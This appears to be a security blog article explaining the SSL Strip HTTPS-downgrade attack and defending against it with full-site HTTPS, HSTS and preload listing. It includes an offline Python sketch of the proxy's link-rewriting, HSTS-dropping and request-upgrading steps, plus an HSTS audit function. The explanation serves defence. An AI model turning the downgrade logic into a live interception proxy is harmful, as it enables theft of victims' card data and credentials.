Since their introduction to the commercial market, SSL/TLS certificates have gone through several major security revisions, and a correctly configured HTTPS connection is now, for practical purposes, unbreakable by direct cryptanalysis. That has not stopped attackers from looking for ways around the encryption rather than through it. We have already written about man-in-the-middle attacks and SSL sniffing, but one MitM technique deserves an article of its own: SSL Strip, a tool that silently downgrades a victim's connection to a website from HTTPS to HTTP. First, a word about its creator, Moxie Marlinspike.
Marlinspike is not a criminal. He is a well-known American security researcher who advocates the widespread use of strong cryptography and privacy-enhancing technologies (PETs). He first presented SSL Strip, and the weakness in the way users reach HTTPS sites that it exploits, at the Black Hat security conference in 2009. What SSL Strip does is alarming, but the good news is that a website can defend against it with a couple of configuration changes. Before we get to the defence, let's see how SSL Strip subverts the secure connection.
Why is SSL Strip so dangerous?
SSL Strip does not intercept traffic by itself. The attacker first has to get between the victim and the internet (for example with ARP spoofing on a shared network or a rogue Wi-Fi access point) and forward the victim's web traffic to a proxy under the attacker's control. Now let's put ourselves in the attacker's shoes. We are sitting between the victim and every website they visit, and all of their requests pass through our proxy. Without SSL Strip this gets us little: the HTTPS traffic arrives encrypted, and we cannot decrypt it without the server's private key or a certificate the victim's browser trusts.
Things change drastically once SSL Strip is added to the mix. With the Strip running on the proxy, the victim's browser never shows a certificate warning, because it is never given a forged certificate at all: it is quietly kept on plain HTTP, where no certificate is involved. The victim sees no sign that an attack is taking place. So how does SSL Strip fool both the browser and the website's server?
The Strip takes advantage of the way most users reach HTTPS sites. The majority of visitors first land on an HTTP page that redirects them to HTTPS (typically with a 301 or 302 redirect), or they arrive at an HTTPS page via a link from a non-HTTPS page. Suppose the victim wants to buy a digital product and types www.somedigitalproduct.com into the address bar. Browsers have historically defaulted to http:// for a bare host name (recent versions try HTTPS first, which is one reason the attack succeeds less often today), so the request leaves the victim's machine in plain text and lands on the attacker's proxy. The attacker forwards the request to the shop's server, follows the redirect, and receives the secure payment page over HTTPS, for example https://www.somedigitalproduct.com/.
At this point the attacker holds two separate connections: an HTTPS connection to the real server and a plain HTTP connection to the victim. SSL Strip rewrites the page on its way back, replacing every https:// link and form action with http:// and turning any redirect to HTTPS into a redirect to HTTP, then hands the result to the victim's browser. The browser now shows http://www.somedigitalproduct.com/, and everything the victim types into the payment form, card number included, travels in plain text to the attacker, who reads it and forwards it to the server over HTTPS. The server, meanwhile, sees a perfectly normal encrypted session. It did establish one, but with the attacker's machine, not the victim's.
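As an added illustration (not code from the original article and not Marlinspike's tool), the following Python sketch shows the two rewriting steps the proxy performs: downgrading a server response before it reaches the victim, and upgrading the victim's later plain-text requests back to HTTPS before forwarding them. The host names and responses are constructed for the walkthrough and there is no network code, so it runs offline.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Matches an https:// URL prefix and captures its host. Illustrative only: real
# tools also cope with URL encodings and links built in scripts.
HTTPS_LINK = re.compile(rb"https://([A-Za-z0-9.-]+)")

# A stripped page is served over HTTP, where browsers ignore HSTS anyway;
# dropping the header keeps the downgraded response clean.
DROP_HEADERS = {"strict-transport-security"}


class StripState:
    """Remembers which hosts were downgraded, so the proxy knows which of the
    victim's http:// requests must be forwarded to the server as https://."""

    def __init__(self):
        self.stripped_hosts = set()


def _downgrade(data, state):
    """Rewrite every https://host in data to http://host and record the host."""
    def repl(match):
        state.stripped_hosts.add(match.group(1).decode())
        return b"http://" + match.group(1)
    return HTTPS_LINK.sub(repl, data)


def strip_response(status, headers, body, state):
    """Downgrade a response (status, header dict, body bytes) fetched from the
    real server over HTTPS before handing it to the victim over plain HTTP."""
    new_headers = {}
    for name, value in headers.items():
        if name.lower() in DROP_HEADERS:
            continue
        if name.lower() == "location":
            # The redirect to HTTPS becomes a redirect to HTTP (the 302 case).
            value = _downgrade(value.encode(), state).decode()
        new_headers[name] = value
    if new_headers.get("Content-Type", "").startswith("text/html"):
        body = _downgrade(body, state)            # links and form actions
        new_headers["Content-Length"] = str(len(body))
    return status, new_headers, body


def upgrade_request(url, state):
    """The victim now sends http:// requests; those aimed at a downgraded host
    are forwarded to the server over HTTPS, so the server sees nothing unusual."""
    parts = urlsplit(url)
    if parts.scheme == "http" and parts.hostname in state.stripped_hosts:
        return urlunsplit(("https", parts.netloc, parts.path, parts.query, parts.fragment))
    return url


# Constructed sample traffic for the walkthrough (not captured from a real site).
SHOP_REDIRECT = (302, {"Location": "https://www.somedigitalproduct.com/",
                       "Content-Type": "text/html"}, b"")
SHOP_PAGE = (200, {"Content-Type": "text/html",
                   "Strict-Transport-Security": "max-age=31536000"},
             b'<form action="https://www.somedigitalproduct.com/pay" method="post">'
             b'<input name="card"></form>'
             b'<a href="http://blog.somedigitalproduct.com/">blog</a>')


def walkthrough():
    """Run the attack sequence on the sample traffic; return what each side sees."""
    state = StripState()
    _, hdrs, _ = strip_response(*SHOP_REDIRECT, state)     # victim gets an http:// redirect
    _, hdrs2, page = strip_response(*SHOP_PAGE, state)     # victim gets an http:// form
    victim_post = "http://www.somedigitalproduct.com/pay"  # card details leave in the clear
    return {
        "redirect_seen_by_victim": hdrs["Location"],
        "page_seen_by_victim": page,
        "hsts_reached_victim": "Strict-Transport-Security" in hdrs2,
        "forwarded_to_server": upgrade_request(victim_post, state),
        "untouched": upgrade_request("http://blog.somedigitalproduct.com/", state),
    }


if __name__ == "__main__":
    for key, value in walkthrough().items():
        print(f"{key}: {value}")
```

The point of the `StripState` map is the part that is easy to miss: the server never sees plain HTTP, because the proxy re-upgrades each request it forwards, which is why the server-side logs show an ordinary TLS session while the victim's side of the conversation is entirely in the clear.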
How to protect your website from SSL Strip
SSL Strip works whenever a victim's first contact with a site happens over plain HTTP and the browser has no reason to insist on HTTPS. Websites that mix HTTP and HTTPS are especially exposed, because every plain-text page is a place where the downgrade can begin. To stay on the safe side, serve the entire site over HTTPS, including images, scripts, files and videos, and redirect every HTTP request to its HTTPS equivalent. That redirect alone is not enough, since SSL Strip intercepts and rewrites it. The second layer is HSTS (HTTP Strict Transport Security), a response header that tells the browser to connect to the site only over HTTPS and to upgrade any http:// link to that site on its own, before sending a single request. One caveat: a browser honours the header only after receiving it over a genuine HTTPS connection, so a first-ever visit, or a visit after the policy's max-age has expired, is still exposed. Submitting the domain to the browsers' HSTS preload list closes that gap, because a preloaded browser refuses plain HTTP to the domain from the start.
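To check the two defences described above, here is an added Python audit function (example code, not from the article) that inspects a site's HTTP and HTTPS responses for an HTTP-to-HTTPS redirect and a usable Strict-Transport-Security header. The responses are constructed inline to show a weak configuration next to a partial and a hardened one; the one-year `max-age` threshold is the minimum the browser preload list accepts, and `shop.example` is a placeholder host.

```python
ONE_YEAR = 365 * 24 * 3600            # minimum max-age accepted by the HSTS preload list
REDIRECTS = {301, 302, 307, 308}


def parse_hsts(value):
    """Parse a Strict-Transport-Security header value into a dict of directives.
    Returns None when the mandatory max-age directive is missing or not numeric."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"')
    if not directives.get("max-age", "").isdigit():
        return None
    directives["max-age"] = int(directives["max-age"])
    return directives


def audit_site(http_response, https_response):
    """Return a list of findings. Each response is (status, header dict);
    an empty list means the site passes both checks."""
    findings = []

    # Check 1: a plain-HTTP request must be sent straight to https://.
    status, headers = http_response
    location = headers.get("Location", "")
    if status not in REDIRECTS or not location.startswith("https://"):
        findings.append("plain HTTP is served instead of redirected to https://")

    # Check 2: the HTTPS response must carry a strong HSTS policy. The header is
    # only honoured over HTTPS, so it is pointless to look for it on the HTTP reply.
    status, headers = https_response
    hsts = headers.get("Strict-Transport-Security")
    if hsts is None:
        findings.append("HTTPS response carries no Strict-Transport-Security header")
        return findings
    parsed = parse_hsts(hsts)
    if parsed is None:
        findings.append(f"malformed HSTS header: {hsts!r}")
        return findings
    if parsed["max-age"] == 0:
        findings.append("HSTS max-age=0 tells browsers to forget the policy")
    elif parsed["max-age"] < ONE_YEAR:
        findings.append(f"HSTS max-age {parsed['max-age']} is below one year; policy lapses early")
    if "includesubdomains" not in parsed:
        findings.append("HSTS lacks includeSubDomains: a subdomain on plain HTTP can still be stripped")
    if "preload" not in parsed:
        findings.append("HSTS lacks preload: the first-ever visit is still exposed")
    return findings


# Constructed responses for placeholder host shop.example (no real site was queried).
WEAK_SITE = (
    (200, {"Content-Type": "text/html"}),                   # HTTP: page served in the clear
    (200, {"Content-Type": "text/html"}),                   # HTTPS: no HSTS at all
)
PARTIAL_SITE = (
    (302, {"Location": "https://shop.example/"}),           # redirect present, but strippable
    (200, {"Strict-Transport-Security": "max-age=300"}),    # short-lived, not preloadable
)
HARDENED_SITE = (
    (301, {"Location": "https://shop.example/"}),
    (200, {"Strict-Transport-Security":
           "max-age=63072000; includeSubDomains; preload"}),
)


if __name__ == "__main__":
    for name, site in [("weak", WEAK_SITE), ("partial", PARTIAL_SITE), ("hardened", HARDENED_SITE)]:
        print(name, audit_site(*site) or ["OK"])
```

Run against live responses, the same function would take the header dicts returned by any HTTP client; the constructed inputs simply make the weak, partial and hardened cases reproducible side by side. Note that `includeSubDomains` and `preload` are both required for preload-list submission, so a header that passes this audit is also one the list will accept.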